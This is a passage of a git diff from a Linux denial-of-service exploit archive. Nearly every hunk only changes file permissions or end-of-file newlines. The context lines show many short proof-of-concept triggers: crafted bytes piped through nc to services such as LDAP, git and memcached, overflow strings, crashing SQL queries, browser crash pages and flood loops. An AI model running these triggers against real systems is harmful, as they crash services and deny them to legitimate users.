"\xff\xff\xff\x00\x84\x41\x42\x43\x44"' | nc localhost 389 \ No newline at end of file +perl -e 'print "\xff\xff\xff\x00\x84\x41\x42\x43\x44"' | nc localhost 389 \ No newline at end of file diff --git a/platforms/linux/dos/32018.txt b/platforms/linux/dos/32018.txt old mode 100755 new mode 100644 diff --git a/platforms/linux/dos/32019.txt b/platforms/linux/dos/32019.txt old mode 100755 new mode 100644 diff --git a/platforms/linux/dos/32112.txt b/platforms/linux/dos/32112.txt old mode 100755 new mode 100644 index 21ff8607d..d51a6c522 --- a/platforms/linux/dos/32112.txt +++ b/platforms/linux/dos/32112.txt @@ -18,4 +18,4 @@ Trying 192.168.1.2... Connected to 192.168.1.2. Escape character is '^]'. I am sorry, but there is no free PTY left! -Connection closed by foreign host. \ No newline at end of file +Connection closed by foreign host. \ No newline at end of file diff --git a/platforms/linux/dos/32248.txt b/platforms/linux/dos/32248.txt old mode 100755 new mode 100644 index bd83a536a..9677a0705 --- a/platforms/linux/dos/32248.txt +++ b/platforms/linux/dos/32248.txt @@ -8,4 +8,4 @@ Yelp 2.23.1 is vulnerable; other versions may also be affected. ftp://%08x.%08x.%08x.%08x.%08x.%08x %x%x%x%x%x%x:// -%08x%08x \ No newline at end of file +%08x%08x \ No newline at end of file diff --git a/platforms/linux/dos/32304.txt b/platforms/linux/dos/32304.txt old mode 100755 new mode 100644 diff --git a/platforms/linux/dos/32348.txt b/platforms/linux/dos/32348.txt old mode 100755 new mode 100644 index acd27de7a..9041900c1 --- a/platforms/linux/dos/32348.txt +++ b/platforms/linux/dos/32348.txt @@ -8,4 +8,4 @@ This issue affects versions prior to MySQL 5.0.66, 5.1.26, and 6.0.6. The following proof-of-concept query is available: -select b''; \ No newline at end of file +select b''; \ No newline at end of file diff --git a/platforms/linux/dos/32384.txt b/platforms/linux/dos/32384.txt old mode 100755 new mode 100644 index f75e0ff3a..e1f949e96 --- a/platforms/linux/dos/32384.txt +++ b/platforms/linux/dos/32384.txt @@ -62,4 +62,4 @@ filename=file1:file2 ioengine=mmap rw=randwrite direct=1 -filename=file1:file2 \ No newline at end of file +filename=file1:file2 \ No newline at end of file diff --git a/platforms/linux/dos/32451.txt b/platforms/linux/dos/32451.txt old mode 100755 new mode 100644 index 1796e0b5a..2a0c074a3 --- a/platforms/linux/dos/32451.txt +++ b/platforms/linux/dos/32451.txt @@ -13,4 +13,4 @@ An attacker can exploit this issue with readily available tools. The following 'gdb' command is sufficient to trigger a kernel crash: -gdb any_executable 1 \ No newline at end of file +gdb any_executable 1 \ No newline at end of file diff --git a/platforms/linux/dos/32452.txt b/platforms/linux/dos/32452.txt old mode 100755 new mode 100644 diff --git a/platforms/linux/dos/32471.txt b/platforms/linux/dos/32471.txt old mode 100755 new mode 100644 index 0c63bfa0c..b923e42cb --- a/platforms/linux/dos/32471.txt +++ b/platforms/linux/dos/32471.txt @@ -6,4 +6,4 @@ An attacker may exploit this vulnerability to cause Konqueror to crash, resultin The issue affects Konqueror 3.5.9; other versions may also be affected. -<!--- Jeremy Brown [0xjbrown41@gmail.com/http://jbrownsec.blogspot.com] Tested on Ubuntu 8.04 + Konqueror 3.5.9 A product of my fuzzing projects :) --> <html> <script type="text/javascript"> document.load(''); </script> </html> \ No newline at end of file +<!--- Jeremy Brown [0xjbrown41@gmail.com/http://jbrownsec.blogspot.com] Tested on Ubuntu 8.04 + Konqueror 3.5.9 A product of my fuzzing projects :) --> <html> <script type="text/javascript"> document.load(''); </script> </html> \ No newline at end of file diff --git a/platforms/linux/dos/32551.txt b/platforms/linux/dos/32551.txt old mode 100755 new mode 100644 index 98e60174b..69c86787c --- a/platforms/linux/dos/32551.txt +++ b/platforms/linux/dos/32551.txt @@ -10,4 +10,4 @@ The issue affects Dovecot 1.1.4 and 1.1.5. The following invalid message address header is sufficient to trigger this issue: -"From: (" \ No newline at end of file +"From: (" \ No newline at end of file diff --git a/platforms/linux/dos/32682.c b/platforms/linux/dos/32682.c old mode 100755 new mode 100644 diff --git a/platforms/linux/dos/32696.txt b/platforms/linux/dos/32696.txt old mode 100755 new mode 100644 index 71b1b7d5e..05990c86a --- a/platforms/linux/dos/32696.txt +++ b/platforms/linux/dos/32696.txt @@ -12,4 +12,4 @@ remote:/<a href="javascript:alert(1)">Here</a> applications:/<font size="8">THE GAME</font> applications:/<iframe src="http://milw0rm.com"> remote://crash:konqueror@ -applications://crash:konqueror@ \ No newline at end of file +applications://crash:konqueror@ \ No newline at end of file diff --git a/platforms/linux/dos/32726.txt b/platforms/linux/dos/32726.txt old mode 100755 new mode 100644 index 493472fa8..414cf4c90 --- a/platforms/linux/dos/32726.txt +++ b/platforms/linux/dos/32726.txt @@ -4,4 +4,4 @@ Ganglia is prone to a remote stack-based buffer-overflow vulnerability because t Attackers can leverage this issue to execute arbitrary code in the context of the application. Successful exploits will compromise the application and the underlying computer. Failed attacks will cause denial-of-service conditions. -echo "/`python -c \"print \\"%s/%s\\" % ('a'*300,'b'*300)\"`" |nc localhost 8652 \ No newline at end of file +echo "/`python -c \"print \\"%s/%s\\" % ('a'*300,'b'*300)\"`" |nc localhost 8652 \ No newline at end of file diff --git a/platforms/linux/dos/32740.txt b/platforms/linux/dos/32740.txt old mode 100755 new mode 100644 diff --git a/platforms/linux/dos/32749.txt b/platforms/linux/dos/32749.txt old mode 100755 new mode 100644 index f92e25bcb..43a36a6a5 --- a/platforms/linux/dos/32749.txt +++ b/platforms/linux/dos/32749.txt @@ -10,4 +10,4 @@ NOTE: This issue was previously thought to be a subset of the vulnerability docu Sending a filename that contains the maximum number of allowable characters and that includes the characters defined by the hex data below will crash the application. -'26 23 38 32 32 37 3b 20 26 23 38 32 32 38 3b 20 26 23 38 32 32 39 3b 20 85' \ No newline at end of file +'26 23 38 32 32 37 3b 20 26 23 38 32 32 38 3b 20 26 23 38 32 32 39 3b 20 85' \ No newline at end of file diff --git a/platforms/linux/dos/32775.txt b/platforms/linux/dos/32775.txt old mode 100755 new mode 100644 diff --git a/platforms/linux/dos/32800.txt b/platforms/linux/dos/32800.txt old mode 100755 new mode 100644 diff --git a/platforms/linux/dos/32815.c b/platforms/linux/dos/32815.c old mode 100755 new mode 100644 diff --git a/platforms/linux/dos/32838.txt b/platforms/linux/dos/32838.txt old mode 100755 new mode 100644 index 64f8a06a4..f8b77944e --- a/platforms/linux/dos/32838.txt +++ b/platforms/linux/dos/32838.txt @@ -10,4 +10,4 @@ MySQL 5.1.31 and earlier MySQL 6.0.9 and earlier select updatexml('','0/a',''); -select extractvalue('','0/a'); \ No newline at end of file +select extractvalue('','0/a'); \ No newline at end of file diff --git a/platforms/linux/dos/32849.txt b/platforms/linux/dos/32849.txt old mode 100755 new mode 100644 index df517635c..103476363 --- a/platforms/linux/dos/32849.txt +++ b/platforms/linux/dos/32849.txt @@ -10,4 +10,4 @@ CREATE CONVERSION test=# CREATE DEFAULT CONVERSION test2 FOR 'KOI8' TO 'LATIN1' FROM mic_to_ascii; CREATE CONVERSION -test=# set client_encoding to 'LATIN1'; \ No newline at end of file +test=# set client_encoding to 'LATIN1'; \ No newline at end of file diff --git a/platforms/linux/dos/32856.txt b/platforms/linux/dos/32856.txt old mode 100755 new mode 100644 diff --git a/platforms/linux/dos/32857.txt b/platforms/linux/dos/32857.txt old mode 100755 new mode 100644 diff --git a/platforms/linux/dos/3289.c b/platforms/linux/dos/3289.c old mode 100755 new mode 100644 diff --git a/platforms/linux/dos/3290.c b/platforms/linux/dos/3290.c old mode 100755 new mode 100644 diff --git a/platforms/linux/dos/32926.c b/platforms/linux/dos/32926.c old mode 100755 new mode 100644 diff --git a/platforms/linux/dos/32961.html b/platforms/linux/dos/32961.html old mode 100755 new mode 100644 index 66cc87ca5..e1d27295c --- a/platforms/linux/dos/32961.html +++ b/platforms/linux/dos/32961.html @@ -4,4 +4,4 @@ Mozilla Firefox is prone to a remote memory-corruption vulnerability. Successful exploits will allow remote attackers to execute arbitrary code within the context of the affected browser or crash the browser, denying service to legitimate users. -<html><head><title> Bug 489647 - New 1.9.0.9 topcrash [@nsTextFrame::ClearTextRun()]</title></head> <body> <div id="a" style="white-space: pre;"> m</div> <script> function doe() { document.getElementById('a').childNodes[0].splitText(1); } setTimeout(doe, 100); </script> </body> </html> \ No newline at end of file +<html><head><title> Bug 489647 - New 1.9.0.9 topcrash [@nsTextFrame::ClearTextRun()]</title></head> <body> <div id="a" style="white-space: pre;"> m</div> <script> function doe() { document.getElementById('a').childNodes[0].splitText(1); } setTimeout(doe, 100); </script> </body> </html> \ No newline at end of file diff --git a/platforms/linux/dos/32964.c b/platforms/linux/dos/32964.c old mode 100755 new mode 100644 diff --git a/platforms/linux/dos/32995.txt b/platforms/linux/dos/32995.txt old mode 100755 new mode 100644 diff --git a/platforms/linux/dos/33015.c b/platforms/linux/dos/33015.c old mode 100755 new mode 100644 diff --git a/platforms/linux/dos/33017.txt b/platforms/linux/dos/33017.txt old mode 100755 new mode 100644 diff --git a/platforms/linux/dos/33031.html b/platforms/linux/dos/33031.html old mode 100755 new mode 100644 index d3ec6fb46..9d8202f62 --- a/platforms/linux/dos/33031.html +++ b/platforms/linux/dos/33031.html @@ -6,4 +6,4 @@ Successful exploits can allow attackers to crash the affected browser, resulting Firefox 3.0.10 is affected; other versions may also be vulnerable. -<!-- Firefox 3.0.10 DOS exploit, discovered by Ahmad Muammar W.K (y3dips[at]echo[dot]or[dot]id) http://y3dips.echo.or.id //--> <html> <head> <title>Firefox Exploit</title> <body background="exploit.gif"> </body> </html> \ No newline at end of file +<!-- Firefox 3.0.10 DOS exploit, discovered by Ahmad Muammar W.K (y3dips[at]echo[dot]or[dot]id) http://y3dips.echo.or.id //--> <html> <head> <title>Firefox Exploit</title> <body background="exploit.gif"> </body> </html> \ No newline at end of file diff --git a/platforms/linux/dos/33036.txt b/platforms/linux/dos/33036.txt old mode 100755 new mode 100644 index 7c85563e3..72803cc96 --- a/platforms/linux/dos/33036.txt +++ b/platforms/linux/dos/33036.txt @@ -10,4 +10,4 @@ Git 1.4.4.5 through 1.6.3.2 are vulnerable; other versions may also be affected. $ perl -e ' $s="git-upload-pack git\0user=me\0host=localhost\0"; printf "%4.4x%s",4+length $s,$s -' | nc $GITHOST 9418 \ No newline at end of file +' | nc $GITHOST 9418 \ No newline at end of file diff --git a/platforms/linux/dos/33040.txt b/platforms/linux/dos/33040.txt old mode 100755 new mode 100644 index 5589b2c36..4c96c90f2 --- a/platforms/linux/dos/33040.txt +++ b/platforms/linux/dos/33040.txt @@ -8,4 +8,4 @@ Versions prior to GUPnP 0.12.8 are affected. POST /Dimming/Control HTTP/1.1 SOAPAction: "urn:schemas-upnp-org:service:Dimming:1#GetLoadLevelStatus" Host: www.example.com:41615 Content-Type: text/xml Content-Length: 0 -================================== \ No newline at end of file +================================== \ No newline at end of file diff --git a/platforms/linux/dos/33041.txt b/platforms/linux/dos/33041.txt old mode 100755 new mode 100644 index 06e304ea2..04849d3f2 --- a/platforms/linux/dos/33041.txt +++ b/platforms/linux/dos/33041.txt @@ -8,4 +8,4 @@ Iirssi 0.8.13 is vulnerable; other versions may also be affected. The following example IRC command is available; please see the references for more information. -: WALLOPS \001ACTION \ No newline at end of file +: WALLOPS \001ACTION \ No newline at end of file diff --git a/platforms/linux/dos/33042.txt b/platforms/linux/dos/33042.txt old mode 100755 new mode 100644 index 8d30e2576..fc5896cec --- a/platforms/linux/dos/33042.txt +++ b/platforms/linux/dos/33042.txt @@ -21,4 +21,4 @@ Start Firefox (which should open two tabs from previous session) Click OK to any authentication windows that pop up. Click to focus on the second tab Click on "Edit document" link -*CRASH* \ No newline at end of file +*CRASH* \ No newline at end of file diff --git a/platforms/linux/dos/33043.txt b/platforms/linux/dos/33043.txt old mode 100755 new mode 100644 index 17b6b7075..00326ad0e --- a/platforms/linux/dos/33043.txt +++ b/platforms/linux/dos/33043.txt @@ -6,4 +6,4 @@ This issue affects the Linux kernel 2.6.22-rc1 through 2.6.29 on the sparc64 arc The following example command is available: -cat /proc/iomem \ No newline at end of file +cat /proc/iomem \ No newline at end of file diff --git a/platforms/linux/dos/33049.txt b/platforms/linux/dos/33049.txt old mode 100755 new mode 100644 diff --git a/platforms/linux/dos/33073.c b/platforms/linux/dos/33073.c old mode 100755 new mode 100644 diff --git a/platforms/linux/dos/33077.c b/platforms/linux/dos/33077.c old mode 100755 new mode 100644 diff --git a/platforms/linux/dos/33088.txt b/platforms/linux/dos/33088.txt old mode 100755 new mode 100644 diff --git a/platforms/linux/dos/33101.txt b/platforms/linux/dos/33101.txt old mode 100755 new mode 100644 diff --git a/platforms/linux/dos/33134.txt b/platforms/linux/dos/33134.txt old mode 100755 new mode 100644 diff --git a/platforms/linux/dos/33148.c b/platforms/linux/dos/33148.c old mode 100755 new mode 100644 diff --git a/platforms/linux/dos/33193.c b/platforms/linux/dos/33193.c old mode 100755 new mode 100644 diff --git a/platforms/linux/dos/33222.txt b/platforms/linux/dos/33222.txt old mode 100755 new mode 100644 diff --git a/platforms/linux/dos/33223.txt b/platforms/linux/dos/33223.txt old mode 100755 new mode 100644 diff --git a/platforms/linux/dos/33224.txt b/platforms/linux/dos/33224.txt old mode 100755 new mode 100644 diff --git a/platforms/linux/dos/33228.txt b/platforms/linux/dos/33228.txt old mode 100755 new mode 100644 diff --git a/platforms/linux/dos/33230.txt b/platforms/linux/dos/33230.txt old mode 100755 new mode 100644 index 383bb842b..258f8328d --- a/platforms/linux/dos/33230.txt +++ b/platforms/linux/dos/33230.txt @@ -9,4 +9,4 @@ GNU glibc 2.10.1 and prior are vulnerable. The following proof-of-concept commands are available: php -r 'money_format("%.1073741821i",1);' -php -r 'money_format("%.1343741821i",1);' \ No newline at end of file +php -r 'money_format("%.1343741821i",1);' \ No newline at end of file diff --git a/platforms/linux/dos/33233.txt b/platforms/linux/dos/33233.txt old mode 100755 new mode 100644 diff --git a/platforms/linux/dos/33269.txt b/platforms/linux/dos/33269.txt old mode 100755 new mode 100644 index 1b28a5f18..95cc4e4c8 --- a/platforms/linux/dos/33269.txt +++ b/platforms/linux/dos/33269.txt @@ -8,4 +8,4 @@ This issue affects Dopewars 1.5.12; other versions may also be affected. The following exploit is available: -ruby -e 'print "foo^^Ar1111111\n^^Acfoo\n^AV65536\n"' | nc localhost 7902 \ No newline at end of file +ruby -e 'print "foo^^Ar1111111\n^^Acfoo\n^AV65536\n"' | nc localhost 7902 \ No newline at end of file diff --git a/platforms/linux/dos/33283.txt b/platforms/linux/dos/33283.txt old mode 100755 new mode 100644 diff --git a/platforms/linux/dos/33289.txt b/platforms/linux/dos/33289.txt old mode 100755 new mode 100644 index e8ef35f71..ee765c6bf --- a/platforms/linux/dos/33289.txt +++ b/platforms/linux/dos/33289.txt @@ -6,4 +6,4 @@ Versions prior to the Linux kernel 2.6.26.4 are affected. The following example is available: -ping -f -s 3000 <IP> \ No newline at end of file +ping -f -s 3000 <IP> \ No newline at end of file diff --git a/platforms/linux/dos/33306.txt b/platforms/linux/dos/33306.txt old mode 100755 new mode 100644 diff --git a/platforms/linux/dos/33312.txt b/platforms/linux/dos/33312.txt old mode 100755 new mode 100644 index 3bd3cd552..0a84a49f1 --- a/platforms/linux/dos/33312.txt +++ b/platforms/linux/dos/33312.txt @@ -10,4 +10,4 @@ NOTE 2: This issue is related to BID 35510 (Multiple BSD Distributions 'gdtoa/mi <script> var a=0.<?php echo str_repeat("1",296450); ?>; -</script> \ No newline at end of file +</script> \ No newline at end of file diff --git a/platforms/linux/dos/33314.html b/platforms/linux/dos/33314.html old mode 100755 new mode 100644 diff --git a/platforms/linux/dos/33397.txt b/platforms/linux/dos/33397.txt old mode 100755 new mode 100644 diff --git a/platforms/linux/dos/33398.txt b/platforms/linux/dos/33398.txt old mode 100755 new mode 100644 diff --git a/platforms/linux/dos/33480.txt b/platforms/linux/dos/33480.txt old mode 100755 new mode 100644 index 57d0cbfd2..c23460175 --- a/platforms/linux/dos/33480.txt +++ b/platforms/linux/dos/33480.txt @@ -6,4 +6,4 @@ Attackers may exploit this issue to execute arbitrary code within the context of MATLAB R2009b is affected; other versions may also be vulnerable. -cxib=0.<?php echo str_repeat("1",296450); ?> \ No newline at end of file +cxib=0.<?php echo str_repeat("1",296450); ?> \ No newline at end of file diff --git a/platforms/linux/dos/33524.txt b/platforms/linux/dos/33524.txt old mode 100755 new mode 100644 diff --git a/platforms/linux/dos/33549.txt b/platforms/linux/dos/33549.txt old mode 100755 new mode 100644 diff --git a/platforms/linux/dos/33571.txt b/platforms/linux/dos/33571.txt old mode 100755 new mode 100644 index 56afb516c..6e618f055 --- a/platforms/linux/dos/33571.txt +++ b/platforms/linux/dos/33571.txt @@ -8,4 +8,4 @@ PostgreSQL 8.0.23 is vulnerable; other versions may also be affected. testdb=# select substring(B'101010101010101010101010101010101010 -10101010101',33,-15); \ No newline at end of file +10101010101',33,-15); \ No newline at end of file diff --git a/platforms/linux/dos/33581.txt b/platforms/linux/dos/33581.txt old mode 100755 new mode 100644 index c061da034..609990b12 --- a/platforms/linux/dos/33581.txt +++ b/platforms/linux/dos/33581.txt @@ -8,4 +8,4 @@ Hybserv2 1.9.4 is vulnerable; other versions may also be affected. The following example command is available: -PRIVMSG memoserv :help \t \ No newline at end of file +PRIVMSG memoserv :help \t \ No newline at end of file diff --git a/platforms/linux/dos/33592.txt b/platforms/linux/dos/33592.txt old mode 100755 new mode 100644 index b2274f5e5..267b0b193 --- a/platforms/linux/dos/33592.txt +++ b/platforms/linux/dos/33592.txt @@ -9,4 +9,4 @@ Successful exploits will deny service to legitimate users. Given the nature of t The following example command is available: -cat /dev/port \ No newline at end of file +cat /dev/port \ No newline at end of file diff --git a/platforms/linux/dos/33635.c b/platforms/linux/dos/33635.c old mode 100755 new mode 100644 diff --git a/platforms/linux/dos/33672.txt b/platforms/linux/dos/33672.txt old mode 100755 new mode 100644 index db18af034..28f1e7f86 --- a/platforms/linux/dos/33672.txt +++ b/platforms/linux/dos/33672.txt @@ -8,4 +8,4 @@ Versions prior to Kojoney 0.0.4.2 are vulnerable. The following example URI is available: -file://localhost/dev/urandom \ No newline at end of file +file://localhost/dev/urandom \ No newline at end of file diff --git a/platforms/linux/dos/33801.txt b/platforms/linux/dos/33801.txt old mode 100755 new mode 100644 index a9843dee1..99639100f --- a/platforms/linux/dos/33801.txt +++ b/platforms/linux/dos/33801.txt @@ -6,4 +6,4 @@ Successful exploits may allow an attacker to execute arbitrary code in the conte NOTE: These issues were previously covered in BID 38918 (Mozilla Firefox Thunderbird and Seamonkey MFSA 2010-09 through -15 Multiple Vulnerabilities) but have been assigned their own record to better document them. -<html> <head></head> <body style="font-family: monospace; width: 0;"> <div style="-moz-column-count: 4;"><div>a b c d<span style="display: list-item;"></span></div></div> </body> </html> \ No newline at end of file +<html> <head></head> <body style="font-family: monospace; width: 0;"> <div style="-moz-column-count: 4;"><div>a b c d<span style="display: list-item;"></span></div></div> </body> </html> \ No newline at end of file diff --git a/platforms/linux/dos/33850.txt b/platforms/linux/dos/33850.txt old mode 100755 new mode 100644 index 4971e8d7a..deab3e9a2 --- a/platforms/linux/dos/33850.txt +++ b/platforms/linux/dos/33850.txt @@ -6,4 +6,4 @@ An attacker can exploit this issue to cause the application to allocate large am memcached versions prior to 1.4.3 are affected. -cat /dev/zero | nc -q1 127.0.0.1 11211 \ No newline at end of file +cat /dev/zero | nc -q1 127.0.0.1 11211 \ No newline at end of file diff --git a/platforms/linux/dos/33886.txt b/platforms/linux/dos/33886.txt old mode 100755 new mode 100644 index 659131f34..9128c29eb --- a/platforms/linux/dos/33886.txt +++ b/platforms/linux/dos/33886.txt @@ -8,4 +8,4 @@ kernel 2.6.34-rc5 is vulnerable. The following proof-of-concept is available: -for ((i=0; i<100000; i++)); do keyctl session wibble /bin/true || break; done \ No newline at end of file +for ((i=0; i<100000; i++)); do keyctl session wibble /bin/true || break; done \ No newline at end of file diff --git a/platforms/linux/dos/3396.php b/platforms/linux/dos/3396.php old mode 100755 new mode 100644 diff --git a/platforms/linux/dos/33965.txt b/platforms/linux/dos/33965.txt old mode 100755 new mode 100644 diff --git a/platforms/linux/dos/34133.txt b/platforms/linux/dos/34133.txt old mode 100755 new mode 100644 diff --git a/platforms/linux/dos/3415.html b/platforms/linux/dos/3415.html old mode 100755 new mode 100644 diff --git a/platforms/linux/dos/34228.txt b/platforms/linux/dos/34228.txt old mode 100755 new mode 100644 diff --git a/platforms/linux/dos/34249.txt b/platforms/linux/dos/34249.txt old mode 100755 new mode 100644 diff --git a/platforms/linux/dos/34278.txt b/platforms/linux/dos/34278.txt old mode 100755 new mode 100644 diff --git a/platforms/linux/dos/34279.txt b/platforms/linux/dos/34279.txt old mode 100755 new mode 100644 diff --git a/platforms/linux/dos/34348.txt b/platforms/linux/dos/34348.txt old mode 100755 new mode 100644 index a347e29f9..f90929f31 --- a/platforms/linux/dos/34348.txt +++ b/platforms/linux/dos/34348.txt @@ -7,4 +7,4 @@ Successfully exploiting these issues allows remote attackers to execute arbitrar OpenLDAP 2.4.22 is vulnerable; other versions may also be affected. ldapmodrdn -x cn=something,dc=anything cn=#80 -ldapmodrdn -x dc=something,dc=anything dc= \ No newline at end of file +ldapmodrdn -x dc=something,dc=anything dc= \ No newline at end of file diff --git a/platforms/linux/dos/34356.txt b/platforms/linux/dos/34356.txt old mode 100755 new mode 100644 index a7073daa5..ed3d49042 --- a/platforms/linux/dos/34356.txt +++ b/platforms/linux/dos/34356.txt @@ -6,4 +6,4 @@ Successfully exploiting this issue may allow remote attackers to execute arbitra gif2png 2.5.2 is vulnerable; other versions may also be affected. -$> ./gif2png $(perl -e 'print "A" x 1053') \ No newline at end of file +$> ./gif2png $(perl -e 'print "A" x 1053') \ No newline at end of file diff --git a/platforms/linux/dos/34364.html b/platforms/linux/dos/34364.html old mode 100755 new mode 100644 diff --git a/platforms/linux/dos/34375.txt b/platforms/linux/dos/34375.txt old mode 100755 new mode 100644 index 31e8e09fa..f4fe528a2 --- a/platforms/linux/dos/34375.txt +++ b/platforms/linux/dos/34375.txt @@ -6,4 +6,4 @@ An attacker can exploit this issue to execute arbitrary code within the context sSMTP 2.6.2 is vulnerable; other versions may also be affected. -echo -n . ; for i in {1..2050} ; do echo -n $i ; done \ No newline at end of file +echo -n . ; for i in {1..2050} ; do echo -n $i ; done \ No newline at end of file diff --git a/platforms/linux/dos/3441.c b/platforms/linux/dos/3441.c old mode 100755 new mode 100644 diff --git a/platforms/linux/dos/34427.txt b/platforms/linux/dos/34427.txt old mode 100755 new mode 100644 diff --git a/platforms/linux/dos/34506.txt b/platforms/linux/dos/34506.txt old mode 100755 new mode 100644 diff --git a/platforms/linux/dos/34510.txt b/platforms/linux/dos/34510.txt old mode 100755 new mode 100644 diff --git a/platforms/linux/dos/34520.txt b/platforms/linux/dos/34520.txt old mode 100755 new mode 100644 diff --git a/platforms/linux/dos/34521.txt b/platforms/linux/dos/34521.txt old mode 100755 new mode 100644 index 2496ee490..72fca3447 --- a/platforms/linux/dos/34521.txt +++ b/platforms/linux/dos/34521.txt @@ -8,4 +8,4 @@ Versions prior to MySQL 5.1.49 are vulnerable. The following example query is available: -mysql> BINLOG '-2079193929'; \ No newline at end of file +mysql> BINLOG '-2079193929'; \ No newline at end of file diff --git a/platforms/linux/dos/34522.txt b/platforms/linux/dos/34522.txt old mode 100755 new mode 100644 index 9266b9043..c0bedb913 --- a/platforms/linux/dos/34522.txt +++ b/platforms/linux/dos/34522.txt @@ -8,4 +8,4 @@ Versions prior to MySQL 5.1.49 are vulnerable. NOTE: This issue was previously disclosed in BID 42586 (Oracle MySQL Prior to 5.1.49 Multiple Denial Of Service Vulnerabilities) but has been assigned its own record. -thd->query at 0x14bcdf0 = CREATE TEMPORARY TABLE operations ( op VARCHAR(16) ) ENGINE =InnoDB \ No newline at end of file +thd->query at 0x14bcdf0 = CREATE TEMPORARY TABLE operations ( op VARCHAR(16) ) ENGINE =InnoDB \ No newline at end of file diff --git a/platforms/linux/dos/34953.txt b/platforms/linux/dos/34953.txt old mode 100755 new mode 100644 diff --git a/platforms/linux/dos/35013.c b/platforms/linux/dos/35013.c old mode 100755 new mode 100644 diff --git a/platforms/linux/dos/35061.c b/platforms/linux/dos/35061.c old mode 100755 new mode 100644 diff --git a/platforms/linux/dos/35081.txt b/platforms/linux/dos/35081.txt old mode 100755 new mode 100644 diff --git a/platforms/linux/dos/35162.cob b/platforms/linux/dos/35162.cob old mode 100755 new mode 100644 diff --git a/platforms/linux/dos/35173.txt b/platforms/linux/dos/35173.txt old mode 100755 new mode 100644 diff --git a/platforms/linux/dos/35240.c b/platforms/linux/dos/35240.c old mode 100755 new mode 100644 diff --git a/platforms/linux/dos/35302.c b/platforms/linux/dos/35302.c old mode 100755 new mode 100644 diff --git a/platforms/linux/dos/35403.c b/platforms/linux/dos/35403.c old mode 100755 new mode 100644 diff --git a/platforms/linux/dos/35404.c b/platforms/linux/dos/35404.c old mode 100755 new mode 100644 diff --git a/platforms/linux/dos/35432.txt b/platforms/linux/dos/35432.txt old mode 100755 new mode 100644 diff --git a/platforms/linux/dos/35445.txt b/platforms/linux/dos/35445.txt old mode 100755 new mode 100644 index 8fe900380..f8fc8ebea --- a/platforms/linux/dos/35445.txt +++ b/platforms/linux/dos/35445.txt @@ -4,4 +4,4 @@ OpenLDAP is prone to a remote denial-of-service vulnerability that affects the ' Attackers can exploit this issue to deny service to legitimate users by crashing affected 'slapd' servers. -ldapmodrdn -x -H ldap://ldapserver -r '' o=test \ No newline at end of file +ldapmodrdn -x -H ldap://ldapserver -r '' o=test \ No newline at end of file diff --git a/platforms/linux/dos/35478.txt b/platforms/linux/dos/35478.txt old mode 100755 new mode 100644 index c24369988..c7dea8058 --- a/platforms/linux/dos/35478.txt +++ b/platforms/linux/dos/35478.txt @@ -6,4 +6,4 @@ An attacker can exploit this issue to consume all CPU resources, denying service MHonArc versions 2.6.16 and prior are vulnerable. -<bo<bo<bo<bo<body>dy>dy>dy>dy> \ No newline at end of file +<bo<bo<bo<bo<body>dy>dy>dy>dy> \ No newline at end of file diff --git a/platforms/linux/dos/35600.c b/platforms/linux/dos/35600.c old mode 100755 new mode 100644 diff --git a/platforms/linux/dos/35738.php b/platforms/linux/dos/35738.php old mode 100755 new mode 100644 diff --git a/platforms/linux/dos/35820.c b/platforms/linux/dos/35820.c old mode 100755 new mode 100644 diff --git a/platforms/linux/dos/3586.php b/platforms/linux/dos/3586.php old mode 100755 new mode 100644 diff --git a/platforms/linux/dos/35951.py b/platforms/linux/dos/35951.py index 177c1bd36..e66265428 100755 --- a/platforms/linux/dos/35951.py +++ b/platforms/linux/dos/35951.py @@ -57,4 +57,4 @@ def main(argv): print "received: " +data s.close() -main(sys.argv) \ No newline at end of file +main(sys.argv) \ No newline at end of file diff --git a/platforms/linux/dos/35957.txt b/platforms/linux/dos/35957.txt old mode 100755 new mode 100644 diff --git a/platforms/linux/dos/36024.txt b/platforms/linux/dos/36024.txt old mode 100755 new mode 100644 diff --git a/platforms/linux/dos/36190.txt b/platforms/linux/dos/36190.txt old mode 100755 new mode 100644 diff --git a/platforms/linux/dos/36267.c b/platforms/linux/dos/36267.c old mode 100755 new mode 100644 diff --git a/platforms/linux/dos/36268.c b/platforms/linux/dos/36268.c old mode 100755 new mode 100644 diff --git a/platforms/linux/dos/36404.c b/platforms/linux/dos/36404.c old mode 100755 new mode 100644 diff --git a/platforms/linux/dos/36425.txt b/platforms/linux/dos/36425.txt old mode 100755 new mode 100644 index 814064476..12248090f --- a/platforms/linux/dos/36425.txt +++ b/platforms/linux/dos/36425.txt @@ -6,4 +6,4 @@ An attacker can exploit this issue to cause an out-of-memory error in certain li Linux kernel versions 2.6.35 and earlier are affected. -$ for i in 1 2 3 4 5 6 7 8 ; do ./feedftp $i >/dev/null & done \ No newline at end of file +$ for i in 1 2 3 4 5 6 7 8 ; do ./feedftp $i >/dev/null & done \ No newline at end of file diff --git a/platforms/linux/dos/36545.txt b/platforms/linux/dos/36545.txt old mode 100755 new mode 100644 index f634f6de7..41ba2fbcb --- a/platforms/linux/dos/36545.txt +++ b/platforms/linux/dos/36545.txt @@ -9,4 +9,4 @@ NOTE: This issue affects Linux kernels running as guest images. [bits 32] global _start SECTION .text -_start: syscall \ No newline at end of file +_start: syscall \ No newline at end of file diff --git a/platforms/linux/dos/36633.txt b/platforms/linux/dos/36633.txt old mode 100755 new mode 100644 diff --git a/platforms/linux/dos/36669.txt b/platforms/linux/dos/36669.txt old mode 100755 new mode 100644 diff --git a/platforms/linux/dos/36743.c b/platforms/linux/dos/36743.c old mode 100755 new mode 100644 diff --git a/platforms/linux/dos/36906.txt b/platforms/linux/dos/36906.txt old mode 100755 new mode 100644 diff --git a/platforms/linux/dos/370.c b/platforms/linux/dos/370.c old mode 100755 new mode 100644 diff --git a/platforms/linux/dos/37036.txt b/platforms/linux/dos/37036.txt old mode 100755 new mode 100644 diff --git a/platforms/linux/dos/37051.c b/platforms/linux/dos/37051.c old mode 100755 new mode 100644 diff --git a/platforms/linux/dos/371.c b/platforms/linux/dos/371.c old mode 100755 new mode 100644 diff --git a/platforms/linux/dos/37306.txt b/platforms/linux/dos/37306.txt old mode 100755 new mode 100644 index 3f5ec76fb..97d73c3db --- a/platforms/linux/dos/37306.txt +++ b/platforms/linux/dos/37306.txt @@ -7,4 +7,4 @@ An attacker can exploit this issue to cause the affected application to crash or echo -en "\e[2147483647L" echo -en "\e[2147483647M" echo -en "\e[2147483647@" -echo -en "\e[2147483647P" \ No newline at end of file +echo -en "\e[2147483647P" \ No newline at end of file diff --git a/platforms/linux/dos/37477.txt b/platforms/linux/dos/37477.txt old mode 100755 new mode 100644 index d643c088a..b6d8e804a --- a/platforms/linux/dos/37477.txt +++ 